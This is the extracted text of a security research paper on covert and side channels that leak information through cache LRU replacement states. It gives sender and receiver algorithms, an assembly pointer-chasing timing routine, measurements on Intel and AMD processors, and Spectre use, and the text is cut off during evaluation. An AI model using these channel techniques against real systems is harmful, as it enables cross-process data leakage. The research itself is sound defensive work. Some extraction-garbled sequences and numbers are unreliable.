[PDF] Leaking Information Through Cache LRU States

Abstract

The Least-Recently Used cache replacement policy and its variants are widely deployed in modern processors. This paper shows for the first time in detail that the LRU states of caches can be used to leak information: any access to a cache by a sender will modify the LRU state, and the receiver is able to observe this through a timing measurement. This paper presents LRU timing-based channels both when the sender and the receiver have shared memory, e.g., shared library data pages, and when they are separate processes without shared memory. In addition, the new LRU timing-based channels are demonstrated on both Intel and AMD processors in scenarios where the sender and the receiver are sharing the cache in both hyper-threaded setting and time-sliced setting. The transmission rate of the LRU channels can be up to 600Kbps per cache set in the hyper-threaded setting. Different from the majority of existing cache channels which require the sender to trigger cache misses, the new LRU channels work with the sender only having cache hits, making the channel faster and more stealthy. This paper also demonstrates that the new LRU channels can be used in transient execution attacks, e.g., Spectre. Further, this paper shows that the LRU channels pose threats to existing secure cache designs, and this work demonstrates the LRU channels affect the secure PL cache. The paper finishes by discussing and evaluating possible defenses.

Full PDF

LLeaking Information Through Cache LRU States

Wenjie Xiong

Yale UniversityNew Haven, CT 06520, USA [email protected] Jakub Szefer

Yale UniversityNew Haven, CT 06520, USA [email protected]

ABSTRACT

The Least-Recently Used cache replacement policy andits variants are widely deployed in modern processors.This paper shows for the ﬁrst time in detail that theLRU states of caches can be used to leak information:any access to a cache by a sender will modify the LRUstate, and the receiver is able to observe this through atiming measurement. This paper presents LRU timing-based channels both when the sender and the receiverhave shared memory, e.g., shared library data pages,and when they are separate processes without sharedmemory. In addition, the new LRU timing-based chan-nels are demonstrated on both Intel and AMD proces-sors in scenarios where the sender and the receiver aresharing the cache in both hyper-threaded setting andtime-sliced setting. The transmission rate of the LRUchannels can be up to 600Kbps per cache set in thehyper-threaded setting. Diﬀerent from the majority ofexisting cache channels which require the sender to trig-ger cache misses, the new LRU channels work with thesender only having cache hits, making the channel fasterand more stealthy. This paper also demonstrates thatthe new LRU channels can be used in transient execu-tion attacks, e.g., Spectre. Further, this paper showsthat the LRU channels pose threats to existing securecache designs, and this work demonstrates the LRUchannels aﬀect the secure PL cache. The paper ﬁnishesby discussing and evaluating possible defenses.

1. INTRODUCTION

Side channels and covert channels in processors havebeen gaining renewed attention in recent years [1]. Manyof these channels leverage the timing information. Todate, researchers have shown numerous timing-basedchannels in caches, e.g., [2, 3, 4, 5, 6, 7], as well asother parts of the processor, such as the shared func-tional units in simultaneous multithreading (SMT) pro-cessors, e.g., [8, 9, 10, 11, 12, 13, 14, 15]. The canonicalexample of timing channels are the channels in caches,where timing reveals information about cache states.This in turn can be used to leak information, such ascryptographic keys, e.g., [16, 17, 18, 4, 19]. Further,many of the variants of the recent Spectre and Melt-down attacks also use covert channels, in addition totransient execution, to exﬁltrate data, e.g., [20, 21, 22].In processor caches, the order in which the cache lines are evicted depends on the cache replacement policy.Normally, diﬀerent variants of the Least-Recently Used(LRU) policy are implemented in modern processors,such as Tree-PLRU [23] or Bit-PLRU [24]. In a cache,the LRU state is maintained for each cache set, and itis used to determine which cache line in the cache setshould be evicted when there is a cache miss causing acache replacement. The LRU state is updated on everycache accesses to indicate which cache line in the setwas just accessed. Thus, both cache hits and misses inthe set cause updates to the LRU state of the set.The basis of the new LRU timing-based channels isthe timing of the cache accesses, as it is aﬀected by theLRU states. Thus, the LRU channels work even whenthe sender only triggers a cache hit, and the receiverlater triggers a possible replacement and then measuresthe time – unlike prior attacks, which require a cachemiss to be triggered by the sender. This makes theattacks more stealthy. It may also allow the attacksto bypass defenses such as based on performance coun-ters [25] where behavior of cache missies is monitored.Moreover, lack of required missies for the sender ben-eﬁts the transient execution attacks, as only a smallspeculation window is required for the sender to triggera cache hit, compared to a miss.The new LRU timing-based channels are also a threatto many of the existing secure caches proposals. Nu-merous secure caches [26, 27, 28, 29, 30, 31, 32, 33,34, 35, 36] have been presented, and they aim to eitherpartition or randomize the victim’s and the attacker’scache accesses to defend the cache timing-based sidechannels. However, most of the secure caches have notconsidered the LRU states and are vulnerable to thenew LRU channel. Especially, this paper demonstratesthe vulnerability to the new LRU-based attacks in thewell-known Partition-Locked (PL) cache [27], and thenshows how to mitigate the attacks in the PL cache.In this paper, the new LRU timing-based channelsare demonstrated and evaluated in-depth for the ﬁrsttime. The biggest challenge of the LRU channels ishow the receiver can accurately observe which level ofcache a memory access hits in, i.e. how to measure thetiming precisely. This paper proposes to use dedicateddata structures and a pointer chasing algorithm in thereceiver’s program to allow for ﬁne-grained measure-ments of the latency of the memory accesses. Further, a r X i v : . [ c s . CR ] J a n wo algorithms are designed to build LRU timing chan-nels: both with and without shared memory betweenthe sender and the receiver, making the LRU channelspractical in a variety of attack scenarios. We evaluatedthe LRU channels on a number of commercial proces-sors including Intel and AMD processors with diﬀer-ent microarchitectures, and both hyper-threaded andtime-sliced sharing settings are considered. The LRUchannels are also demonstrated in Spectre attack. Thecontributions of this work are as follows: • The ﬁrst detailed presentation of how the LRUstates in caches can be used as a timing-based sideand covert channels for information leaks, bothwith and without shared memory between thesender and the receiver. • Detailed analysis and evaluation of the LRU chan-nels, including evaluation of the transmission ratesand bit error rates of the LRU covert channels onboth Intel and AMD processors and comparison ofthe LRU channels with the existing cache channelsfrom the perspective of encoding time and cachemiss rates. • Demonstration of LRU channels in transient exe-cution attacks. • Demonstration in gem5 simulator of how the LRUchannels break the security of PL cache [27], andhow it can be ﬁxed. • Proposal for, and evaluation of, mitigations of theLRU channels.

2. BACKGROUND2.1 Timing-Based Cache Channels

There are typically two types of timing-based cacheside and covert channels. One type leverages the con-tention in the cache bank [9, 11]. The other leverage thestates in the cache, e.g., tag state (if a certain addressis in the cache) [2, 3, 4, 5] or cache coherence state [7].Like other side and covert channels leveraging portcontention [8, 10, 12], channels leveraging the contentionin the cache bank [9, 11] require the sender and the re-ceiver to execute concurrently as two hyper-threads.Channels using cache states leverage the fact thatwhether a cache line is available in the cache or notaﬀects the timing of the cache operations. The senderand the receiver do not have to be two concurrent hyper-threads. They can be within one thread or share thecache in time-sliced setting. All these existing channels,however, require a cache miss by the sender to changethe cache state when the sender is sending information.For example, in Flush+Reload attacks [2], the senderwill need to access the cache line that was previouslyﬂushed to memory by the receiver. Thus, the accesswill cause a cache miss. Meanwhile, any cache access,both cache hit or miss, can trigger the new LRU attack.

When a cache line is accessed but it is not in thecache (i.e., a cache miss), the cache line will be fetched into the cache set. In this case, another cache line needsto be evicted from the cache set to make room for theincoming cache line. The replacement policy selects acache way from the set to evict, known as the victimway . The replacement algorithm uses some state tostore the history of accesses to cache ways in a given set.In L1 cache, the LRU policy and its variants are mostwidely used because they give high cache hit rate. Inlast level cache (LLC), due to the reduced data locality,other replacement policies can be used [37, 38].

LRU:

The LRU algorithm keeps track of the ageof cache lines. If a cache replacement is needed on acache miss, the least recently used cache way (i.e., old-est way) will be selected to be the victim way and willbe evicted. In an N -way cache, log ( N ) bits are used percache line per way to store the age of the line, for a to-tal of N log ( N ) bits for each cache set. The “true” LRUalgorithm is expensive in terms of latency (to updateLRU states) and area (to store the age of all the cachelines). So often a variant of a Pseudo Least-RecentlyUsed (PLRU) is used instead. Tree-PLRU:

The Tree-PLRU [23] policy uses a bi-nary tree structure to keep track of the cache access his-tory in a cache set. Each tree node indicates whetherthe left sub-tree or the right sub-tree has been less re-cently used. To ﬁnd the victim way, the replacementalgorithm starts from the root and always goes to theless recently used child to ﬁnd the leaf node that indi-cates the victim way. To update the Tree-PLRU whena cache line in a way is accessed, all the nodes on thepath from the root to the accessed way’s leaf node areset to point to the child that is not the ancestor of theaccessed cache way. For an N -way cache, the tree has N − N − Bit-PLRU:

The Bit-PLRU [24] policy, which is alsocalled Most Recently Used (MRU) policy, uses one bitto store the history of each cache way, called

MRU-bit .When a way is accessed, its MRU-bit will be set to 1,indicating the way is recently used. Once all the wayshave the MRU-bit set to 1, all the MRU-bits are reset to0. To ﬁnd a victim, the way with the lowest index whoseMRU-bit is 0 is chosen. For an N -way cache set, a totalof N bits are required. The logic of the Bit-PLRU issimpler than Tree-PLRU.

3. THREAT MODEL AND ASSUMPTIONS

In this paper, we demonstrate a covert channel, andwe always use the term sender and receiver. A cachecovert channel can be extended to a side channel whenthe victim has secret-dependent accesses [2, 3, 4, 5, 9].We assume N -way set-associative caches and furtherassume the cache uses an LRU, Tree-PLRU, or bit-PLRU replacement algorithm which evicts the least re-cently used cache line. Like all other side or covertchannels, the LRU timing-based channel involves twoparties: the sender and the receiver. Following tech-niques used in [39, 40], we assume the two parties canbe co-located on the same core to share the L1 cache,as shown in Figure 1, either in an SMT machine as R Sender Receiver

Core

L1 cacheL2 cache

Phase

Initialization:Encoding:Decoding:Set 0Set 1Set

M-1 … … … way 0 – way (N-1)

LRUstateSet LRU state to a known stateSender changes the LRU stateReceiver measures the LRU state

Figure 1:

Cache organization and the phases of the new LRUtiming-based side and covert channels. two hyper-threads running in parallel or as two threadstime-sharing the core. The LRU states of the sharedcache can be inﬂuenced (by the sender) and observed(by the receiver). Existing attacks, such as side chan-nels [11, 12, 13, 14, 15] or Spectre attacks using BranchTarget Buﬀer (BTB) or Return Stack Buﬀer (RSB) [20,41, 42], show that sharing of the same physical core ispractical and poses real threats for computer systems.In this paper, we focus on the LRU states in L1 cache.The LRU channels in the other levels of caches are alsopossible . Depending on the cache architecture, for thesender to update the LRU states of the lower level ofcaches, a miss in the higher cache level is required, e.g.,the sender’s accesses to L1 or L2 caches will not changethe replacement state in the LLC. Especially, L1 is di-rectly accessed by the processor pipeline and L1 LRUstate is updated on every memory access. Thus, attackin the LRU states of L1 is more stealthy. And the timingchannels in LRU states in L2 or LLC can be detectedor protected by the existing cache side channel detec-tion or protection techniques in L1 and prefetching thesecure-relevant data to L1.For all types of attacks, we assume the receiver canextract useful information from the memory access pat-tern of the sender, which modiﬁes the LRU states.

4. LRU TIMING-BASED CHANNELS

Our new LRU timing-based channels leverage the LRUstates of cache sets. In this section, we discuss how theLRU state in one cache set can be used to transfer in-formation, which is referred to as the target set .The LRU state for each set contains several bits, thusit is possible to transfer more than 1 bit per targetset. However, limited by the fact that any access tothe set will change the LRU state, we focus on lettingthe receiver only measure the set once. Especially, thereceiver can observe the timing of one memory accesswhich can only have two results: a cache hit or a cachemiss. Thus, at most one bit can be transferred per cacheset at one time. To transfer information using an LRUchannel, in general, there are three phases: Concurrently to this submission, a preprint paper [43] hasbeen recently posed on arXiv on side channels that leveragethe replacement policy in LLC. However, our work demon-strates the LRU channels both with and without sharedmemory and without using clﬂush instruction.

Initialization Phase:

First, a sequence of memoryaccesses is performed so that the LRU state is partiallyknown to the receiver.

Encoding Phase:

To send information, the senderaccesses one or more memory locations mapping to thetarget set to change the LRU state. The pattern ofmemory accesses depends on the information to be sent.Algorithms in this paper are designed to be light-weightin the encoding phase, where the sender only needs todo at most one memory access.

Decoding Phase:

The receiver ﬁrst accesses one ormore memory locations mapping to the target set to po-tentially trigger a cache replacement and cause a cacheline to be evicted based on the LRU state. The receiverthen observes the timing of accessing the memory loca-tion to learn if the cache line is evicted and thus inferwhat the LRU state was.

Algorithm 1 shows a communication protocol usingthe LRU cache states assuming shared memory. Thesender and the receiver ﬁrst agree on the target cacheset they will use to transfer information. We use theterm line – N to denote N +1 diﬀerent cache lines thatmap to the target set. This can be achieved by usingdata in N +1 diﬀerent physical addresses with the samecache index bits but diﬀerent tag bits. Note that line n (where n ∈ [0 , N ]) refers to a cache line with a certainphysical address and not a speciﬁc cache entry, and thename does not imply certain literal physical address n .The line n could be placed in any cache way in the set.In Algorithm 1, the sender and the receiver both needto use the same physical address (or a physical addresswithin the cache line) to access cache line 0 in the cache.This can be achieved by a memory location in a shareddynamic linked library, as in [2]. Further, m is a 1-bit message to be sent, and d is a parameter indicatinghow the receiver’s accesses are split between the initial-ization and decoding phase. Then, the sender and thereceiver can build a channel following Algorithm 1.For example, when N = 8 and d = 8, the sequence ofmemory accesses when sending m = 0 is as follows: • Init. Phase: 0 → → → → → → → • Encoding Phase: no access • Decoding Phase: 8 → , and the receiver willobserve L1 miss when accessing line 0 in the end.Meanwhile, the sequence of memory accesses whensending m = 1 is as follows: • Init. Phase: 0 → → → → → → → • Encoding Phase: 0 (hit) • Decoding Phase: 8 → newest line in the LRU state, and With PLRU replacement algorithms, line 0 is not guaran-teed to be evicted. However, as will be evaluated in Sec-tion 4.3, line 0 will be evicted in most of the cases. lgorithm 1:

LRU Channel with Shared Memory line 0– N : cache lines mapping to the target setm: a 1-bit message to transfer on the channeld: a parameter of the receiver Receiver Operations: // Step 0: Initialization Phase for i = 0; i < d ; i = i + 1 do Access line i; end sleep; // To allow the sender code to run here for encoding// Step 2: Decoding Phase for i = d ; i < N + 1; i = i + 1 do Access line i; end

Access line 0 and time the access;

Sender Operations: // Step 1: Encoding Phase if m=1 then Access line 0; else

Do not access line 0; end the remaining accesses in the decoding phase will notevict it. When the receiver measures the time of ac-cessing line 0 in the decoding phase, the receiver willobserve an L1 cache hit, and the receiver can infer thatthe sender has sent m = 1.Comparing Algorithm 1 with Flush+Reload attack [2],both require shared memory, but the LRU channel doesnot require explicit ﬂush, and line 0 might always be inthe cache, i.e., the sender might only have cache hits. In Algorithm 2, the sender and the receiver do notneed to access any shared memory location. The senderand the receiver can map memory accesses to the tar-get set by using proper virtual memory addresses intheir own memory spaces. For performance, L1 cacheis usually virtual-indexed and physical-tagged (VIPT).For example, for an L1 cache with 64 sets with a cacheline size of 64 bytes, bits 6–11 of the address decide thecache set. The receiver can make sure lines 0–( N − N by using memory lo-cations with bits 6–11 of the virtual address to be thesame as line N . Then, the sender and the receiver canbuild a channel following Algorithm 2.For example, when N = 8 and d = 4, the order ofmemory accesses when sending m = 0 is as follows: • Init. Phase: 0 → → → • Encoding Phase: no access • Decoding Phase: 4 → → → → m = 1 is: • Init. Phase: 0 → → → • Encoding Phase: 8 (hit, if line 8 is in cache beforeInit. Phase) • Decoding Phase: 4 → → → → Algorithm 2:

LRU Channel w/o Shared Memory line 0– N : cache lines mapping to the target setm: a 1-bit message to transfer on the channeld: a parameter of the receiver Receiver Operations: // Step 0: Initialization Phase for i = 0; i < d ; i = i + 1 do Access line i; end sleep; // To allow the sender code to run here for encoding// Step 2: Decoding Phase for i = d ; i < N ; i = i + 1 do Access line i; end

Access line 0 and time the access;

Sender Operations: // Step 1: Encoding Phase if m=1 then Access line N ; else Do not access target set; end line 7 misses in the cache. The receiver will observean L1 cache hit when accessing line 0 if the sender issending m = 0, and will observe an L1 cache miss if thesender is sending m = 1. Compared to Algorithm 1,there will be more noise in this channel, as any threadaccessing the target set can cause line 0 to be evicted. Amiss of line 0 does not necessarily mean that the senderaccessed line 8. The noise is due to no shared mem-ory, and other known cache side channel attacks (e.g.,Prime+Probe channel [3]) also have this source of noise.Comparing Algorithm 2 with Flush+Reload attack,no shared memory is required. Comparing Algorithm 2with Prime+Probe attack [3], in Prime+Probe, the re-ceiver will access the whole set in both the prime and theprobe phases, and the sender will have a miss betweenthe two phases. Meanwhile, in Algorithm 2, the receiverdoes not access the whole set in either phase. The re-ceiver only needs to measure the time of one memoryaccess in LRU channel rather than the time of N mem-ory accesses in the Prime+Probe attack. Moreover, thesender’s data line N might always be in the cache. In true LRU, the least recently used way is alwayschosen as the victim. Consider the following two mem-ory accesses sequences in an 8-way cache, with eachnumber representing accessing a cache line in the set: • Sequence 1 (access in order): 0 → → → → → → → → • Sequence 2 (access in order with random insertion):0 ( → x ) → → x ) → → x ) → → x ) → → x ) → → x ) → → x ) →

7. Here, line x is acache line that maps to this cache set and is diﬀerentfrom lines 0–7. The parentheses indicate the accessmight happen or not, and we assume line x will beaccessed at least once.If true LRU is used, line 0 will be evicted in both se-quences. However, in PLRU, line 0 is not guaranteedable 1: Probability of line 0 being evicted with PLRU.

Init.Cond. Num.LoopIter. LRU Tree-PLRU Bit-PLRUSeq.1&2 Seq.1 Seq.2 Seq.1 Seq.2 R a nd o m > = 8 100% 100% ∼

62% 100% ∼ S e q u e n t i a l > = 8 100% 100% ∼

62% 100% ∼ Table 2:

Latency of cache access (cycles).

Microarchitecture L1D L2

Intel Sandy Bridge 4-5 12Intel Skylake 4-5 12AMD Zen 4-5 17 to be evicted. Because PLRU uses fewer state bits totrack the memory access history, the cache LRU statebefore the access sequence could still aﬀect the choiceof victim way, and longer history should be consideredwhen analyzing the PLRU. Consider the following ini-tial conditions before accessing the above sequence: • Random: The cache contains some of the lines 0–7and probably other lines, and the initial access orderof lines 0–7 is random (e.g., the lines in the set areaccessed in a random order probably with lines otherthan lines 0–7 ). • Sequential: The cache contains some of the lines 0–7 and probably other lines, and the initial accessof lines 0–7 is in sequential order (e.g., the set isaccessed in order with the random insertion of linesother than lines 0–7 like Sequence 2).We implemented an in-house simulator to simulatethe Tree-PLRU [23] and Bit-PLRU [24] replacementpolicies in an 8-way set. First, in the warm-up phases,we create accesses to the set for each of the possibleinitial conditions. Then, Sequence 1 or Sequence 2 isaccessed in a loop, and whether line 0 is in the cache af-ter each sequence is recorded for each loop iteration. Werepeat the above test in the simulator for 10 ,

000 timesfor each conﬁguration, and present results in Table 1.As shown in Table 1, under random initial condition,line 0 might still be kept in the cache with a high prob-ability. Meanwhile, sequential initial condition gives ahigh probability of line 0 being evicted after several loopiterations, especially for sequence 1 and the Bit-PLRU.Note that true LRU will always evict line 0. Thus, tobuild a covert channel through the LRU states underPLRU policy, the receiver should ensure the sequentialinitial condition by placing line 1–7 in the receiver’s ad-dress space and then always accessing them in order tomaximize the success rate.

The major challenge for the receiver is to measurethe memory access time precisely and to distinguish anL1 cache hit and an L1 cache miss (an L2 cache hit orlonger). Table 2 shows the access latency of L1 hit and rdtscpmovl %eax , %e s imovq (%rbx ) , %rax //L1 h i tmovq (%rax ) , %rax //L1 h i tmovq (%rax ) , %rax //L1 h i tmovq (%rax ) , %rax //L1 h i tmovq (%rax ) , %rax //L1 h i tmovq (%rax ) , %rax //L1 h i tmovq (%rax ) , %rax //L1 h i tmovq (%rax ) , %rax // t a r g e t address to measurerdtscpsubl %e s i , %eax

Figure 2:

Pointer chasing algorithm used to measure time.

Figure 3:

Histogram of access latencies of seven L1 hits and the8th being L1 hit or miss when measuring one target address withpointer chasing (left) on Intel Xeon E5-2690 and (right) on AMDEPYC 7571.

L1 miss on the microarchitectures we tested. L1 hittakes less than 5 CPU cycles, and L2 hit takes about10–20 CPU cycles. Due to the noise caused by the seri-alizing and the granularity of time stamp counter, using rdtscp instruction (or lfence and rdtsc instructions) tomeasure the latency of a memory access cannot distin-guish L1 hit from L2 hit. The measurement results ofL1 hit and L2 hit are the same.Thus, we use pointer chasing algorithm and a dedi-cated data structure to measure one memory access pre-cisely. In the pointer chasing algorithm in Figure 2, alinked list, where each element stores the address of thenext elements, is required. In the code listed, the rbx points to the head of the linked list. Since the address ofthe mov instruction depends on the data fetched fromthe previous mov instruction, all the eight accesses areserialized. However, in a side and covert channel sce-nario, it is not practical to use Algorithm 1 to build alinked list containing the sender’s memory access desti-nation in a read-only shared library.Instead of a linked list in the shared library, we usea linked list of 7 elements in the receiver’s own mem-ory space, and let the 7 th element contain the memoryaddress to be measured. In this way, when measuringlatency with the pointer chasing algorithm in Figure 2,it will ﬁrst access 7 local elements and the target ad-dress at the end. Before running the measurement, thereceiver can fetch the ﬁrst 7 local elements to L1 cache,so the ﬁrst 7 accesses will always hit in L1 and the to-tal time depends on whether the 8th element is in L1cache or not. To avoid the ﬁrst 7 elements polluting the The size of the linked list does not have to be 7. However,if the size is small, the noise due to lfence will aﬀect themeasurements. If the size is large, there will be noise inaccessing the elements in the linked list. lgorithm 3:

Covert Channel Protocol m: k-bit message to be sent on the channel T s : sender’s sending period T r : receiver’s sampling timeTSC: current time stamp counter, obtained by rdtscp Sender Code:for i = 0; i < k ; i = i + 1 dofor an amount time T s do Step 1: Encoding Phase, encoding m[k] endendReceiver Code:while

True do Step 0: Initializion Phase while

TSC < T last + T r do nothing; end T last =TSCStep 2: Decoding Phase end Table 3:

Speciﬁcations of the tested CPU models.

Model IntelXeonE5-2690 IntelXeonE3-1245v5 AMDEPYC7571

Microarchitecture SandyBridge Skylake ZenNumber of cores 8 4 N/A a L1D size of each core 32KB 32KB 32KBL1D associativity 8-way 8-way 8-wayFrequency 3.8GHz 3.9GHz 2.5GHzOS 16.04.1 Ubuntu a We use the AMD processor on Amazon AWS EC2 platform.The CPU model is speciﬁc for Amazon AWS. One core wasleased for our experiments.

LRU state of the target set, the 7 elements can be inone cache set and any other set can be the target set.Figure 3 shows the result of this measurement strategy(L1 hit of the ﬁrst 7 elements and the 8th element be-ing L1 hit or miss). The diﬀerence between an L1 hitand an L1 miss of the 8th element is distinguishable onthe Intel processors. The latency of L1 hit and L1 missshow diﬀerent distributions on the AMD processor.

5. EVALUATION

To evaluate the transmission rate of the LRU chan-nel, we evaluate it as a covert channel using one targetset in the L1 data cache. As shown in Algorithm 3, thesender sends each bit of message m for T s CPU cycles,by running the sender’s operations (in Algorithm 1 or2) for T s in a loop for each bit in the message that thesender wants to send. T s decides the transmission rate.We calculate the transmission rate with the total num-ber of bits sent divided by the time (measured by time in Linux). The receiver runs the receiver’s operations(in Algorithm 1 or 2) every T r CPU cycles in a loop andmeasures the latency using pointer chasing discussed inSection 4.4.The evaluation is conducted on both Intel and AMDprocessors. The speciﬁcations of the tested CPU modelsare listed in Table 3. We evaluated both LRU Channel Figure 4:

Example sequences of receiver’s observation whenthe sender is sending 0 and 1 alternatively on Intel Xeon E5-2690 with a transmission rate of 480Kbps using (top) Algorithm1 with T r =600, T s =6000, and d =8 and (bottom) Algorithm 2with T r =600, T s =6000 and d =4. The blue dots show the latenciesobserved by the receiver, and the red dot line shows the thresholdof the L1 cache hit. with shared memory and without shared memory pre-sented in Section 4 under both hyper-threaded sharingand time-sliced sharing settings. For the hyper-threading case, we tested the covertchannel when the sender and the receiver are sharingthe same physical core as two hyper-threads. Each ofthe sender and the receiver is a process (i.e., a separateprogram) in Linux.

LRU Channel with Shared Memory:

In Algo-rithm 1, shared memory is needed among the senderand the receiver processes, e.g., achieved by a sharedlibrary. Figure 4 (top) shows the traces observed bythe receiver when the sender is sending 0 and 1 alter-natively. When the sender is sending bit 1, the accesstime of line 0 by the receiver is shorter, as is discussedin Section 4.1. Due to the space limit, only the resultson Intel Xeon E5-2690 are shown in Figure 4. Evalu-ation on E3-1245 v5 shows similar results, except thatthe two processors have diﬀerent thresholds for L1 hitand miss latencies. This is due to diﬀerent latencies forL1 or L2 cache access on the two. Also, the two pro-cessors are running at diﬀerent frequencies, and thus,even with the same T s = 6000, the transmission rate is480Kbps for E5-2690 and 580Kbps for E3-1245 v5.In the evaluation, the sender process sends a ran-dom 128-bit binary string repeatedly. There are 3 typesof errors in the channel: 1) bit ﬂips, 2) bit insertions,or 3) bit loss. To evaluate the error rate of the chan-nel, the edit distance between the sent string and thereceived string is calculated using the Wagner-Fischeralgorithm [44]. We evaluate T r = { , , } cy-cles, and T s = { , , , } cycles. Thereceiver’s operations of Algorithm 1 in total takes aboutigure 5: Transmission error rate (evaluated by edit distance ) as a function of the transmission rate (diﬀerent T s ) for diﬀerent T r onIntel Xeon E5-2690 using (top) Algorithm 1 and (bottom) Algorithm 2.

560 cycles, including logging of the results, and thus, T r > d is 8, we test param-eter d = { , , , , , , , } . Also, the 128-bit string issent at least 30 times to obtain the average errors.Figure 5 (top) shows the error rate of the channel ver-sus the diﬀerent transmission rates (i.e., diﬀerent valuesof T s ). As shown in the ﬁgure, d does not aﬀect theerror rate much on the E5-2690. This is because, inhyper-threaded sharing, the sender process and the re-ceiver process execute in parallel. The sender operationcan happen when the receiver is executing any part ofhis or her operation, and d only makes the sender op-eration more likely to happen in the sleep part of thereceiver’s operation. T r = 1000 gives a slightly bettererror rate than T r = 600. This might be because moreinterleaving between the two threads due to greater T r and the receiver can observe more sender’s activity inone measurement. As T r increases to 3000 cycles, theerror rate increases. In general, the error rate increasesas the transmission rate increases (i.e., T s decreases).This is because a greater T s or a smaller T r will resultin more measurements for each of the bit transmitted,and the noise can be canceled out by taking the averageof the measurement results. LRU Channel without Shared Memory:

In Al-gorithm 2, shared memory between the sender and thereceiver is not required. Figure 4 (bottom) shows thetraces observed by the receiver. When the sender issending bit 1, the access time of line 0 by the receiveris longer, due to the sender’s access to the same set.For Algorithm 2, we also evaluate the same set ofvalues of T r , T s , and d . Figure 5 (bottom) shows theerror rate versus the diﬀerent transmission rates (dif-ferent values of T s ) on E5-2690. Compared to LRUchannel with shared memory, the LRU channel with-out shared memory has more noise. As indicated in the Figure 6: Percentage of cache hits observed by the receiveron Intel Xeon E5-2690, when the sender is sending (left) 0 and(right) 1 using Algorithm 1 under time-sliced sharing. simulation result of accessing sequence 2 in Section 4.3,in Tree-PLRU, when the sender accesses the set, thereceiver may not observe a miss in the end, resulting ina false 0. Also, any access to the same set (by the otherpart of the program or other processes on the core) mayresult in a false 1. However, these errors usually occurconsecutively in time. So the receiver can detect thenoise if observing a long sequence of all 1 or all 0. Weexclude those traces to obtain Figure 5.When d = { , , } , the error rate is large on E5-2690,especially for large T r . This is because even d makes theTree-PLRU point to another side of the sub-tree, andthe receiver will not evict line 0 during decoding. When the sender and receiver are sharing the samecore in a time-sliced sharing setting, the two processesstill share the same L1 cache. To evaluate the covertchannel in a time-sliced sharing setting, we programmedthe sender process to always send 1 or 0, and the re-ceiver to measure the time of accessing line 0 every T r .Figure 6 shows the percentage of cache hit received fordiﬀerent d and T r when the sender is sending 0 or 1 us-ng Algorithm 1 on both CPUs tested. Each data pointcomes from 1000 measurements.As is shown in Figure 6, with proper parameters, thereceiver can distinguish between the sender sending 0and 1. For example, if d = 8 and T r = 10 cycles, thereceiver will observe almost 100% of L1 cache misseswhen the sender is sending 0, and the receiver will ob-serve about 30% of L1 cache hits when the sender issending 1 on both Intel processors. The receiver doesnot observe hits with a higher probability, because intime-sliced sharing, each process uses the core for a cer-tain period of time. When the receiver monitors thesender in a loop, multiple loop iterations will run withina time-slice period, and only the ﬁrst iteration will re-ﬂect the sender’s behavior, the other iterations in thetime period run without interleaving with the sender.Nevertheless, the receiver can still recognize the mes-sage the sender is sending by the percentage of cache hitreceived. Assuming 10 measurements are needed when T r = 10 to diﬀerentiate 30% from < T r is needed here to have interaction between the twothreads (about 10 cycles for both processors tested).However, if T r is too large, the distinguishability de-creases, as other processes might be scheduled during T r . As is shown in Figure 6, d = 8 and d = 7 gives thebest distinguishability between the sender sending 0 and1. This is because T r is large, and the time for the re-ceiver’s operations becomes small compared to the sleeptime. Thus, the context switch is more likely to happenduring the sleep time. In Algorithm 1, a greater d leadsto fewer accesses to the target set after the sleep, andthus, line 0 is less likely to be evicted during decoding.Such evicted line 0 may result in a false 0.We also tried to demonstrate Algorithm 2 but failedto observe any signal from the measurement. We thinkthe reason is that the T r should be large to allow inter-ference between the sender and the receiver, however,any other processes running during T r could pollute thetarget set and introduce a lot of noise. For power-savings, AMD L1 cache has a special linearaddress utag and way-predictor (see 2.6.2.2 in [45]). The utag is a hash of the linear address. For a load, whilethe physical address is looked up in TLB, the L1 cacheuses the hash of the linear address to match the utag and determines which cache way to use in the cache set.When the physical address is available, only that cacheway will be looked up instead of all 8 ways. So, whenthe physical address of a load matches a cache line inthe cache, if the utag of that way is of a diﬀerent linearaddress unless the hash of two linear addresses conﬂicts,a latency of an L1 miss will be observed, even thoughthe physical address matches and data is in L1.This makes our Algorithm 1 across processes usingdiﬀerent address spaces limited. If the sender processaccesses line 0, the utag of line 0 will be updated withthe linear address of line 0 in the sender’s address space. Figure 7:

Example sequences of receiver’s observation when thesender is sending 0 and 1 alternatively using (top) Algorithm 1and (bottom) Algorithm 2 on AMD EPYC 7571. For Algorithm1, T r = 1000, T s = 10 , d = 8, and the transmission rate is22Kbps. For Algorithm 2, T r = 1000, T s = 10 , d = 4, and thetransmission rate is 25Kbps. The light blue dot line shows themoving average. Figure 8:

Percentage of Percentage of cache hits observed bythe receiver on AMD EPYC 7571, when the sender and receiverare sharing a core in a time-slice setting and the sender is sending(left) 0 and (right) 1 using Algorithm 1.

When the receiver accesses line 0 and measures the time,unless the hash of the linear address of line 0 in thesender’s process and in the receiver’s process conﬂicts,the receiver will always observe an L1 cache miss latencyno matter if the line 0 is in L1 or not. However, thehash of utag is not designed for security and is possibleto be reverse-engineered. Furthermore, as long as thesender and the receiver are in the same address space,the LRU channel using Algorithm 1 still exists. Forexample, it can be used to transfer information in thecase of escaping sandbox in JavaScript [20].We evaluate the characteristics of the LRU covertchannel on AMD EPYC 7571 processor on AmazonAWS EC2 platform. Figure 7 (top) shows the traceobserved by the receiver, when the receiver and thesender are two threads in the same address space (us-ing pthread s in C) running in a hyper-threaded sharingusing Algorithm 1. Due to the coarse granularity ofthe readout value of the time stamp counter in AMD,it is hard to identify the signal from the raw measure-ments (blue dots). The light blue dot line in Figure 7hows the moving average of the latency of 97 measure-ments, where the 97 is the best ﬁt period of sendingone bit for this trace . When the sender is sending 0and 1 alternatively, the moving average is a wave-likepattern, meaning the receiver can receive the messagefrom the sender. By measuring the total time taken bythe receiver to gather the trace and the period of eachbit received, the eﬀective transmission rate is 22Kbps.Due to the coarser-granularity of the AMD time stampcounter and lower frequency, the transmission rate ofthe channel is about one order of magnitude lower thanthat in Intel processors.We also tested Algorithm 2 under hyper-threadedsharing on AMD EPYC 7571. Figure 7 (bottom) showsa trace observed by the receiver. The receiver and thesender are two programs (in diﬀerent memory space).Similarly, the light blue dot line shows the moving av-erage of the latency of 85 measurements, where the 85is the best ﬁt, resulting in an eﬀective transmission rateof 25Kbps. When the sender is sending 0 and 1 al-ternatively, the moving average is a wave-like pattern,meaning the receiver can receive the message from thesender. The measured latency in Figure 7 (top) and(bottom) are quite diﬀerent. This might due to the pro-cessor running at a diﬀerent frequency for power savingat the time of measurement.We further tested Algorithm 1 under time-sliced shar-ing setting using pthread s. Figure 8 shows the diﬀerentresults observed 